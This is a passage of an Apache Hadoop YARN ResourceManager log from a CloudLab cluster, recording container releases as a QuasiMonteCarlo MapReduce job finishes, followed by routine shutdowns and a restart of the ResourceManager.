2019-09-23 15:25:58,175 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569273478927_0002_000001 released container container_1569273478927_0002_01_000016 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315 #containers=4 available=<memory:60416, vCores:28> used=<memory:5120, vCores:4> with event: FINISHED
2019-09-23 15:25:58,222 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000018 Container Transitioned from RUNNING to COMPLETED
2019-09-23 15:25:58,222 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569273478927_0002_01_000018 in state: COMPLETED event:FINISHED
2019-09-23 15:25:58,222 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0002	CONTAINERID=container_1569273478927_0002_01_000018
2019-09-23 15:25:58,223 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569273478927_0002_01_000018 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which currently has 3 containers, <memory:4096, vCores:3> used and <memory:61440, vCores:29> available, release resources=true
2019-09-23 15:25:58,223 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569273478927_0002_000001 released container container_1569273478927_0002_01_000018 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315 #containers=3 available=<memory:61440, vCores:29> used=<memory:4096, vCores:3> with event: FINISHED
2019-09-23 15:25:59,224 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000017 Container Transitioned from RUNNING to COMPLETED
2019-09-23 15:25:59,224 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569273478927_0002_01_000017 in state: COMPLETED event:FINISHED
2019-09-23 15:25:59,224 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0002	CONTAINERID=container_1569273478927_0002_01_000017
2019-09-23 15:25:59,224 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569273478927_0002_01_000017 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which currently has 2 containers, <memory:3072, vCores:2> used and <memory:62464, vCores:30> available, release resources=true
2019-09-23 15:25:59,225 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569273478927_0002_000001 released container container_1569273478927_0002_01_000017 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315 #containers=2 available=<memory:62464, vCores:30> used=<memory:3072, vCores:2> with event: FINISHED
2019-09-23 15:25:59,456 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: Updating application attempt appattempt_1569273478927_0002_000001 with final state: FINISHING, and exit status: -1000
2019-09-23 15:25:59,456 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569273478927_0002_000001 State change from RUNNING to FINAL_SAVING
2019-09-23 15:25:59,457 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: Updating application application_1569273478927_0002 with final state: FINISHING
2019-09-23 15:25:59,457 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: application_1569273478927_0002 State change from RUNNING to FINAL_SAVING
2019-09-23 15:25:59,457 INFO org.apache.hadoop.yarn.server.resourcemanager.recovery.RMStateStore: Updating info for app: application_1569273478927_0002
2019-09-23 15:25:59,457 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569273478927_0002_000001 State change from FINAL_SAVING to FINISHING
2019-09-23 15:25:59,457 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: application_1569273478927_0002 State change from FINAL_SAVING to FINISHING
2019-09-23 15:26:00,294 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000009 Container Transitioned from RUNNING to COMPLETED
2019-09-23 15:26:00,294 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569273478927_0002_01_000009 in state: COMPLETED event:FINISHED
2019-09-23 15:26:00,294 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0002	CONTAINERID=container_1569273478927_0002_01_000009
2019-09-23 15:26:00,294 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569273478927_0002_01_000009 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which currently has 1 containers, <memory:2048, vCores:1> used and <memory:63488, vCores:31> available, release resources=true
2019-09-23 15:26:00,294 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569273478927_0002_000001 released container container_1569273478927_0002_01_000009 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315 #containers=1 available=<memory:63488, vCores:31> used=<memory:2048, vCores:1> with event: FINISHED
2019-09-23 15:26:00,459 INFO org.apache.hadoop.yarn.server.resourcemanager.ApplicationMasterService: application_1569273478927_0002 unregistered successfully. 
2019-09-23 15:26:06,307 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000001 Container Transitioned from RUNNING to COMPLETED
2019-09-23 15:26:06,307 INFO org.apache.hadoop.yarn.server.resourcemanager.ApplicationMasterService: Unregistering app attempt : appattempt_1569273478927_0002_000001
2019-09-23 15:26:06,308 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569273478927_0002_01_000001 in state: COMPLETED event:FINISHED
2019-09-23 15:26:06,308 INFO org.apache.hadoop.yarn.server.resourcemanager.security.AMRMTokenSecretManager: Application finished, removing password for appattempt_1569273478927_0002_000001
2019-09-23 15:26:06,308 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0002	CONTAINERID=container_1569273478927_0002_01_000001
2019-09-23 15:26:06,308 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569273478927_0002_000001 State change from FINISHING to FINISHED
2019-09-23 15:26:06,308 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569273478927_0002_01_000001 of capacity <memory:2048, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which currently has 0 containers, <memory:0, vCores:0> used and <memory:65536, vCores:32> available, release resources=true
2019-09-23 15:26:06,308 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: application_1569273478927_0002 State change from FINISHING to FINISHED
2019-09-23 15:26:06,308 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569273478927_0002_000001 released container container_1569273478927_0002_01_000001 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315 #containers=0 available=<memory:65536, vCores:32> used=<memory:0, vCores:0> with event: FINISHED
2019-09-23 15:26:06,308 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=Application Finished - Succeeded	TARGET=RMAppManager	RESULT=SUCCESS	APPID=application_1569273478927_0002
2019-09-23 15:26:06,308 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application appattempt_1569273478927_0002_000001 is done. finalState=FINISHED
2019-09-23 15:26:06,308 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.AppSchedulingInfo: Application application_1569273478927_0002 requests cleared
2019-09-23 15:26:06,308 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAppManager$ApplicationSummary: appId=application_1569273478927_0002,name=QuasiMonteCarlo,user=F19_TIP,queue=root.F19_TIP,state=FINISHED,trackingUrl=http://master_hostname:8088/proxy/application_1569273478927_0002/,appMasterHost=cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us,startTime=1569273938663,finishTime=1569273959457,finalStatus=SUCCEEDED,memorySeconds=146833,vcoreSeconds=107,preemptedAMContainers=0,preemptedNonAMContainers=0,preemptedResources=<memory:0\, vCores:0>,applicationType=MAPREDUCE
2019-09-23 15:26:06,309 INFO org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncher: Cleaning master appattempt_1569273478927_0002_000001
2019-09-23 15:26:07,333 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Null container completed...
2019-09-23 15:26:07,334 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Null container completed...
2019-09-23 15:27:58,916 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.AbstractYarnScheduler: Release request cache is cleaned up
2019-09-23 16:04:21,017 ERROR org.apache.hadoop.yarn.server.resourcemanager.ResourceManager: RECEIVED SIGNAL 15: SIGTERM
2019-09-23 16:04:21,021 ERROR org.apache.hadoop.security.token.delegation.AbstractDelegationTokenSecretManager: ExpiredTokenRemover received java.lang.InterruptedException: sleep interrupted
2019-09-23 16:04:21,022 INFO org.mortbay.log: Stopped HttpServer2$SelectChannelConnectorWithSafeStartup@master_hostname:8088
2019-09-23 16:04:21,127 INFO org.apache.hadoop.ipc.Server: Stopping server on 8032
2019-09-23 16:04:21,128 INFO org.apache.hadoop.ipc.Server: Stopping IPC Server listener on 8032
2019-09-23 16:04:21,129 INFO org.apache.hadoop.ipc.Server: Stopping IPC Server Responder
2019-09-23 16:04:21,129 INFO org.apache.hadoop.ipc.Server: Stopping server on 8033
2019-09-23 16:04:21,131 INFO org.apache.hadoop.ipc.Server: Stopping IPC Server listener on 8033
2019-09-23 16:04:21,131 INFO org.apache.hadoop.ipc.Server: Stopping IPC Server Responder
2019-09-23 16:04:21,132 INFO org.apache.hadoop.yarn.server.resourcemanager.ResourceManager: Transitioning to standby state
2019-09-23 16:04:21,132 WARN org.apache.hadoop.yarn.server.resourcemanager.amlauncher.ApplicationMasterLauncher: org.apache.hadoop.yarn.server.resourcemanager.amlauncher.ApplicationMasterLauncher$LauncherThread interrupted. Returning.
2019-09-23 16:04:21,133 INFO org.apache.hadoop.ipc.Server: Stopping server on 8030
2019-09-23 16:04:21,136 INFO org.apache.hadoop.ipc.Server: Stopping IPC Server listener on 8030
2019-09-23 16:04:21,136 INFO org.apache.hadoop.ipc.Server: Stopping server on 8031
2019-09-23 16:04:21,136 INFO org.apache.hadoop.ipc.Server: Stopping IPC Server Responder
2019-09-23 16:04:21,138 INFO org.apache.hadoop.ipc.Server: Stopping IPC Server Responder
2019-09-23 16:04:21,138 INFO org.apache.hadoop.ipc.Server: Stopping IPC Server listener on 8031
2019-09-23 16:04:21,138 ERROR org.apache.hadoop.yarn.server.resourcemanager.ResourceManager: Returning, interrupted : java.lang.InterruptedException
2019-09-23 16:04:21,138 INFO org.apache.hadoop.yarn.util.AbstractLivelinessMonitor: NMLivelinessMonitor thread interrupted
2019-09-23 16:04:21,140 WARN org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Update thread interrupted. Exiting.
2019-09-23 16:04:21,141 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.AllocationFileLoaderService: Interrupted while waiting to reload alloc configuration
2019-09-23 16:04:21,141 INFO org.apache.hadoop.yarn.event.AsyncDispatcher: AsyncDispatcher is draining to stop, igonring any new events.
2019-09-23 16:04:21,141 INFO org.apache.hadoop.yarn.util.AbstractLivelinessMonitor: AMLivelinessMonitor thread interrupted
2019-09-23 16:04:21,141 INFO org.apache.hadoop.yarn.util.AbstractLivelinessMonitor: org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.ContainerAllocationExpirer thread interrupted
2019-09-23 16:04:21,141 INFO org.apache.hadoop.yarn.util.AbstractLivelinessMonitor: AMLivelinessMonitor thread interrupted
2019-09-23 16:04:21,141 ERROR org.apache.hadoop.security.token.delegation.AbstractDelegationTokenSecretManager: ExpiredTokenRemover received java.lang.InterruptedException: sleep interrupted
2019-09-23 16:04:21,142 INFO org.apache.hadoop.metrics2.impl.MetricsSystemImpl: Stopping ResourceManager metrics system...
2019-09-23 16:04:21,144 INFO org.apache.hadoop.metrics2.impl.MetricsSystemImpl: ResourceManager metrics system stopped.
2019-09-23 16:04:21,144 INFO org.apache.hadoop.metrics2.impl.MetricsSystemImpl: ResourceManager metrics system shutdown complete.
2019-09-23 16:04:21,144 INFO org.apache.hadoop.yarn.event.AsyncDispatcher: AsyncDispatcher is draining to stop, igonring any new events.
2019-09-23 16:04:21,144 INFO org.apache.hadoop.yarn.server.resourcemanager.ResourceManager: Transitioned to standby state
2019-09-23 16:04:21,144 INFO org.apache.hadoop.yarn.server.resourcemanager.ResourceManager: SHUTDOWN_MSG: 
/************************************************************
SHUTDOWN_MSG: Shutting down ResourceManager at ctl.hwcluster.ams560-sbu-pg0.utah.cloudlab.us/128.110.153.96
************************************************************/
2019-09-23 16:04:46,164 INFO org.apache.hadoop.yarn.server.resourcemanager.ResourceManager: STARTUP_MSG: 
/************************************************************
STARTUP_MSG: Starting ResourceManager
STARTUP_MSG:   host = ctl.hwcluster.ams560-sbu-pg0.utah.cloudlab.us/128.110.153.96
STARTUP_MSG:   args = []
STARTUP_MSG:   version = 2.7.2
STARTUP_MSG:   build = https://git-wip-us.apache.org/repos/asf/hadoop.git -r b165c4fe8a74265c792ce23f546c64604acf0e41; compiled by 'jenkins' on 2016-01-26T00:08Z
STARTUP_MSG:   java = 1.8.0_222
************************************************************/
2019-09-23 16:04:46,174 INFO org.apache.hadoop.yarn.server.resourcemanager.ResourceManager: registered UNIX signal handlers for [TERM, HUP, INT]
2019-09-23 16:04:46,577 INFO org.apache.hadoop.conf.Configuration: found resource core-site.xml at file:/users/F19_TIP/hadoop/etc/hadoop/core-site.xml
2019-09-23 16:04:46,669 INFO org.apache.hadoop.security.Groups: clearing userToGroupsMap cache
2019-09-23 16:04:46,745 INFO org.apache.hadoop.conf.Configuration: found resource yarn-site.xml at file:/users/F19_TIP/hadoop/etc/hadoop/yarn-site.xml
2019-09-23 16:04:46,904 INFO org.apache.hadoop.yarn.event.AsyncDispatcher: Registering class org.apache.hadoop.yarn.server.resourcemanager.RMFatalEventType for class org.apache.hadoop.yarn.server.resourcemanager.ResourceManager$RMFatalEventDispatcher
2019-09-23 16:04:46,969 INFO org.apache.hadoop.yarn.server.resourcemanager.security.NMTokenSecretManagerInRM: NMTokenKeyRollingInterval: 86400000ms and NMTokenKeyActivationDelay: 900000ms
2019-09-23 16:04:46,973 INFO org.apache.hadoop.yarn.server.resourcemanager.security.RMContainerTokenSecretManager: ContainerTokenKeyRollingInterval: 86400000ms and ContainerTokenKeyActivationDelay: 900000ms
2019-09-23 16:04:46,979 INFO org.apache.hadoop.yarn.server.resourcemanager.security.AMRMTokenSecretManager: AMRMTokenKeyRollingInterval: 86400000ms and AMRMTokenKeyActivationDelay: 900000 ms
2019-09-23 16:04:47,020 INFO org.apache.hadoop.yarn.event.AsyncDispatcher: Registering class org.apache.hadoop.yarn.server.resourcemanager.recovery.RMStateStoreEventType for class org.apache.hadoop.yarn.server.resourcemanager.recovery.RMStateStore$ForwardingEventHandler
2019-09-23 16:04:47,023 INFO org.apache.hadoop.yarn.event.AsyncDispatcher: Registering class org.apache.hadoop.yarn.server.resourcemanager.NodesListManagerEventType for class org.apache.hadoop.yarn.server.resourcemanager.NodesListManager
2019-09-23 16:04:47,023 INFO org.apache.hadoop.yarn.server.resourcemanager.ResourceManager: Using Scheduler: org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler
2019-09-23 16:04:47,060 INFO org.apache.hadoop.yarn.event.AsyncDispatcher: Registering class org.apache.hadoop.yarn.server.resourcemanager.scheduler.event.SchedulerEventType for class org.apache.hadoop.yarn.server.resourcemanager.ResourceManager$SchedulerEventDispatcher
2019-09-23 16:04:47,062 INFO org.apache.hadoop.yarn.event.AsyncDispatcher: Registering class org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppEventType for class org.apache.hadoop.yarn.server.resourcemanager.ResourceManager$ApplicationEventDispatcher
2019-09-23 16:04:47,063 INFO org.apache.hadoop.yarn.event.AsyncDispatcher: Registering class org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptEventType for class org.apache.hadoop.yarn.server.resourcemanager.ResourceManager$ApplicationAttemptEventDispatcher
2019-09-23 16:04:47,064 INFO org.apache.hadoop.yarn.event.AsyncDispatcher: Registering class org.apache.hadoop.yarn.server.resourcemanager.rmnode.RMNodeEventType for class org.apache.hadoop.yarn.server.resourcemanager.ResourceManager$NodeEventDispatcher
2019-09-23 16:04:47,135 INFO org.apache.hadoop.metrics2.impl.MetricsConfig: loaded properties from hadoop-metrics2.properties
2019-09-23 16:04:47,211 INFO org.apache.hadoop.metrics2.impl.MetricsSystemImpl: Scheduled snapshot period at 10 second(s).
2019-09-23 16:04:47,211 INFO org.apache.hadoop.metrics2.impl.MetricsSystemImpl: ResourceManager metrics system started
2019-09-23 16:04:47,235 INFO org.apache.hadoop.yarn.event.AsyncDispatcher: Registering class org.apache.hadoop.yarn.server.resourcemanager.RMAppManagerEventType for class org.apache.hadoop.yarn.server.resourcemanager.RMAppManager
2019-09-23 16:04:47,249 INFO org.apache.hadoop.yarn.event.AsyncDispatcher: Registering class org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncherEventType for class org.apache.hadoop.yarn.server.resourcemanager.amlauncher.ApplicationMasterLauncher
2019-09-23 16:04:47,254 INFO org.apache.hadoop.yarn.server.resourcemanager.RMNMInfo: Registered RMNMInfo MBean
2019-09-23 16:04:47,258 INFO org.apache.hadoop.yarn.security.YarnAuthorizationProvider: org.apache.hadoop.yarn.security.ConfiguredYarnAuthorizer is instiantiated.
2019-09-23 16:04:47,260 INFO org.apache.hadoop.util.HostsFileReader: Refreshing hosts (include/exclude) list
2019-09-23 16:04:47,333 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.AllocationFileLoaderService: Loading allocation file /users/F19_TIP/hadoop/etc/hadoop/fair-scheduler.xml
2019-09-23 16:04:47,364 INFO org.apache.hadoop.yarn.server.resourcemanager.metrics.SystemMetricsPublisher: YARN system metrics publishing service is not enabled
2019-09-23 16:04:47,364 INFO org.apache.hadoop.yarn.server.resourcemanager.ResourceManager: Transitioning to active state
2019-09-23 16:04:47,377 INFO org.apache.hadoop.yarn.server.resourcemanager.recovery.RMStateStore: Updating AMRMToken
2019-09-23 16:04:47,377 INFO org.apache.hadoop.yarn.server.resourcemanager.security.RMContainerTokenSecretManager: Rolling master-key for container-tokens
2019-09-23 16:04:47,377 INFO org.apache.hadoop.yarn.server.resourcemanager.security.NMTokenSecretManagerInRM: Rolling master-key for nm-tokens
2019-09-23 16:04:47,378 INFO org.apache.hadoop.security.token.delegation.AbstractDelegationTokenSecretManager: Updating the current master key for generating delegation tokens
2019-09-23 16:04:47,378 INFO org.apache.hadoop.yarn.server.resourcemanager.security.RMDelegationTokenSecretManager: storing master key with keyID 1
2019-09-23 16:04:47,378 INFO org.apache.hadoop.yarn.server.resourcemanager.recovery.RMStateStore: Storing RMDTMasterKey.
2019-09-23 16:04:47,380 INFO org.apache.hadoop.security.token.delegation.AbstractDelegationTokenSecretManager: Starting expired delegation token remover thread, tokenRemoverScanInterval=60 min(s)
2019-09-23 16:04:47,380 INFO org.apache.hadoop.security.token.delegation.AbstractDelegationTokenSecretManager: Updating the current master key for generating delegation tokens
2019-09-23 16:04:47,380 INFO org.apache.hadoop.yarn.server.resourcemanager.security.RMDelegationTokenSecretManager: storing master key with keyID 2
2019-09-23 16:04:47,380 INFO org.apache.hadoop.yarn.server.resourcemanager.recovery.RMStateStore: Storing RMDTMasterKey.
2019-09-23 16:04:47,382 INFO org.apache.hadoop.yarn.event.AsyncDispatcher: Registering class org.apache.hadoop.yarn.nodelabels.event.NodeLabelsStoreEventType for class org.apache.hadoop.yarn.nodelabels.CommonNodeLabelsManager$ForwardingEventHandler
2019-09-23 16:04:47,416 INFO org.apache.hadoop.ipc.CallQueueManager: Using callQueue class java.util.concurrent.LinkedBlockingQueue
2019-09-23 16:04:47,430 INFO org.apache.hadoop.ipc.Server: Starting Socket Reader #1 for port 8031
2019-09-23 16:04:47,450 INFO org.apache.hadoop.yarn.factories.impl.pb.RpcServerFactoryPBImpl: Adding protocol org.apache.hadoop.yarn.server.api.ResourceTrackerPB to the server
2019-09-23 16:04:47,450 INFO org.apache.hadoop.ipc.Server: IPC Server Responder: starting
2019-09-23 16:04:47,450 INFO org.apache.hadoop.ipc.Server: IPC Server listener on 8031: starting
2019-09-23 16:04:47,494 INFO org.apache.hadoop.ipc.CallQueueManager: Using callQueue class java.util.concurrent.LinkedBlockingQueue
2019-09-23 16:04:47,500 INFO org.apache.hadoop.ipc.Server: Starting Socket Reader #1 for port 8030
2019-09-23 16:04:47,507 INFO org.apache.hadoop.yarn.factories.impl.pb.RpcServerFactoryPBImpl: Adding protocol org.apache.hadoop.yarn.api.ApplicationMasterProtocolPB to the server
2019-09-23 16:04:47,507 INFO org.apache.hadoop.ipc.Server: IPC Server Responder: starting
2019-09-23 16:04:47,507 INFO org.apache.hadoop.ipc.Server: IPC Server listener on 8030: starting
2019-09-23 16:04:47,553 INFO org.apache.hadoop.ipc.CallQueueManager: Using callQueue class java.util.concurrent.LinkedBlockingQueue
2019-09-23 16:04:47,554 INFO org.apache.hadoop.ipc.Server: Starting Socket Reader #1 for port 8032
2019-09-23 16:04:47,557 INFO org.apache.hadoop.yarn.factories.impl.pb.RpcServerFactoryPBImpl: Adding protocol org.apache.hadoop.yarn.api.ApplicationClientProtocolPB to the server
2019-09-23 16:04:47,557 INFO org.apache.hadoop.ipc.Server: IPC Server listener on 8032: starting
2019-09-23 16:04:47,557 INFO org.apache.hadoop.ipc.Server: IPC Server Responder: starting
2019-09-23 16:04:47,567 INFO org.apache.hadoop.yarn.server.resourcemanager.ResourceManager: Transitioned to active state
2019-09-23 16:04:47,647 INFO org.mortbay.log: Logging to org.slf4j.impl.Log4jLoggerAdapter(org.mortbay.log) via org.mortbay.log.Slf4jLog
2019-09-23 16:04:47,653 INFO org.apache.hadoop.security.authentication.server.AuthenticationFilter: Unable to initialize FileSignerSecretProvider, falling back to use random secrets.
2019-09-23 16:04:47,660 INFO org.apache.hadoop.http.HttpRequestLog: Http request log for http.requests.resourcemanager is not defined
2019-09-23 16:04:47,668 INFO org.apache.hadoop.http.HttpServer2: Added global filter 'safety' (class=org.apache.hadoop.http.HttpServer2$QuotingInputFilter)
2019-09-23 16:04:47,672 INFO org.apache.hadoop.http.HttpServer2: Added filter RMAuthenticationFilter (class=org.apache.hadoop.yarn.server.security.http.RMAuthenticationFilter) to context cluster
2019-09-23 16:04:47,672 INFO org.apache.hadoop.http.HttpServer2: Added filter RMAuthenticationFilter (class=org.apache.hadoop.yarn.server.security.http.RMAuthenticationFilter) to context static
2019-09-23 16:04:47,672 INFO org.apache.hadoop.http.HttpServer2: Added filter RMAuthenticationFilter (class=org.apache.hadoop.yarn.server.security.http.RMAuthenticationFilter) to context logs
2019-09-23 16:04:47,672 INFO org.apache.hadoop.http.HttpServer2: Added filter static_user_filter (class=org.apache.hadoop.http.lib.StaticUserWebFilter$StaticUserFilter) to context cluster
2019-09-23 16:04:47,672 INFO org.apache.hadoop.http.HttpServer2: Added filter static_user_filter (class=org.apache.hadoop.http.lib.StaticUserWebFilter$StaticUserFilter) to context static
2019-09-23 16:04:47,672 INFO org.apache.hadoop.http.HttpServer2: Added filter static_user_filter (class=org.apache.hadoop.http.lib.StaticUserWebFilter$StaticUserFilter) to context logs
2019-09-23 16:04:47,676 INFO org.apache.hadoop.http.HttpServer2: adding path spec: /cluster/*
2019-09-23 16:04:47,676 INFO org.apache.hadoop.http.HttpServer2: adding path spec: /ws/*
2019-09-23 16:04:48,001 INFO org.apache.hadoop.yarn.webapp.WebApps: Registered webapp guice modules
2019-09-23 16:04:48,003 INFO org.apache.hadoop.http.HttpServer2: Jetty bound to port 8088
2019-09-23 16:04:48,003 INFO org.mortbay.log: jetty-6.1.26
2019-09-23 16:04:48,071 INFO org.mortbay.log: Extract jar:file:/users/F19_TIP/hadoop/share/hadoop/yarn/hadoop-yarn-common-2.7.2.jar!/webapps/cluster to /tmp/Jetty_ms0833_utah_cloudlab_us_8088_cluster____u3cdjd/webapp
2019-09-23 16:04:48,254 INFO org.apache.hadoop.security.token.delegation.AbstractDelegationTokenSecretManager: Updating the current master key for generating delegation tokens
2019-09-23 16:04:48,254 INFO org.apache.hadoop.security.token.delegation.AbstractDelegationTokenSecretManager: Starting expired delegation token remover thread, tokenRemoverScanInterval=60 min(s)
2019-09-23 16:04:48,255 INFO org.apache.hadoop.security.token.delegation.AbstractDelegationTokenSecretManager: Updating the current master key for generating delegation tokens
2019-09-23 16:04:49,234 INFO org.mortbay.log: Started HttpServer2$SelectChannelConnectorWithSafeStartup@master_hostname:8088
2019-09-23 16:04:49,234 INFO org.apache.hadoop.yarn.webapp.WebApps: Web app cluster started at 8088
2019-09-23 16:04:49,273 INFO org.apache.hadoop.ipc.CallQueueManager: Using callQueue class java.util.concurrent.LinkedBlockingQueue
2019-09-23 16:04:49,274 INFO org.apache.hadoop.ipc.Server: Starting Socket Reader #1 for port 8033
2019-09-23 16:04:49,277 INFO org.apache.hadoop.yarn.factories.impl.pb.RpcServerFactoryPBImpl: Adding protocol org.apache.hadoop.yarn.server.api.ResourceManagerAdministrationProtocolPB to the server
2019-09-23 16:04:49,277 INFO org.apache.hadoop.ipc.Server: IPC Server Responder: starting
2019-09-23 16:04:49,277 INFO org.apache.hadoop.ipc.Server: IPC Server listener on 8033: starting
2019-09-23 16:04:50,202 INFO org.apache.hadoop.yarn.util.RackResolver: Resolved cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us to /default-rack
2019-09-23 16:04:50,205 INFO org.apache.hadoop.yarn.server.resourcemanager.ResourceTrackerService: NodeManager from node cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us(cmPort: 36163 httpPort: 8042) registered with capability: <memory:65536, vCores:32>, assigned nodeId cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:36163
2019-09-23 16:04:50,207 INFO org.apache.hadoop.yarn.server.resourcemanager.rmnode.RMNodeImpl: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:36163 Node Transitioned from NEW to RUNNING
2019-09-23 16:04:50,210 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Added node cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:36163 cluster capacity: <memory:65536, vCores:32>
2019-09-23 16:14:47,351 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.AbstractYarnScheduler: Release request cache is cleaned up
2019-09-23 16:43:42,894 ERROR org.apache.hadoop.yarn.server.resourcemanager.ResourceManager: RECEIVED SIGNAL 15: SIGTERM
2019-09-23 16:43:42,899 ERROR org.apache.hadoop.security.token.delegation.AbstractDelegationTokenSecretManager: ExpiredTokenRemover received java.lang.InterruptedException: sleep interrupted
2019-09-23 16:43:42,901 INFO org.mortbay.log: Stopped HttpServer2$SelectChannelConnectorWithSafeStartup@master_hostname:8088
2019-09-23 16:43:43,008 INFO org.apache.hadoop.ipc.Server: Stopping server on 8032
2019-09-23 16:43:43,010 INFO org.apache.hadoop.ipc.Server: Stopping IPC Server listener on 8032
2019-09-23 16:43:43,010 INFO org.apache.hadoop.ipc.Server: Stopping IPC Server Responder
2019-09-23 16:43:43,010 INFO org.apache.hadoop.ipc.Server: Stopping server on 8033
2019-09-23 16:43:43,012 INFO org.apache.hadoop.ipc.Server: Stopping IPC Server listener on 8033
2019-09-23 16:43:43,013 INFO org.apache.hadoop.ipc.Server: Stopping IPC Server Responder
2019-09-23 16:43:43,013 INFO org.apache.hadoop.yarn.server.resourcemanager.ResourceManager: Transitioning to standby state
2019-09-23 16:43:43,013 WARN org.apache.hadoop.yarn.server.resourcemanager.amlauncher.ApplicationMasterLauncher: org.apache.hadoop.yarn.server.resourcemanager.amlauncher.ApplicationMasterLauncher$LauncherThread interrupted. Returning.
2019-09-23 16:43:43,014 INFO org.apache.hadoop.ipc.Server: Stopping server on 8030
2019-09-23 16:43:43,016 INFO org.apache.hadoop.ipc.Server: Stopping IPC Server listener on 8030
2019-09-23 16:43:43,016 INFO org.apache.hadoop.ipc.Server: Stopping server on 8031
2019-09-23 16:43:43,016 INFO org.apache.hadoop.ipc.Server: Stopping IPC Server Responder
2019-09-23 16:43:43,017 INFO org.apache.hadoop.ipc.Server: Stopping IPC Server Responder
2019-09-23 16:43:43,018 INFO org.apache.hadoop.yarn.util.AbstractLivelinessMonitor: NMLivelinessMonitor thread interrupted
2019-09-23 16:43:43,019 INFO org.apache.hadoop.ipc.Server: Stopping IPC Server listener on 8031
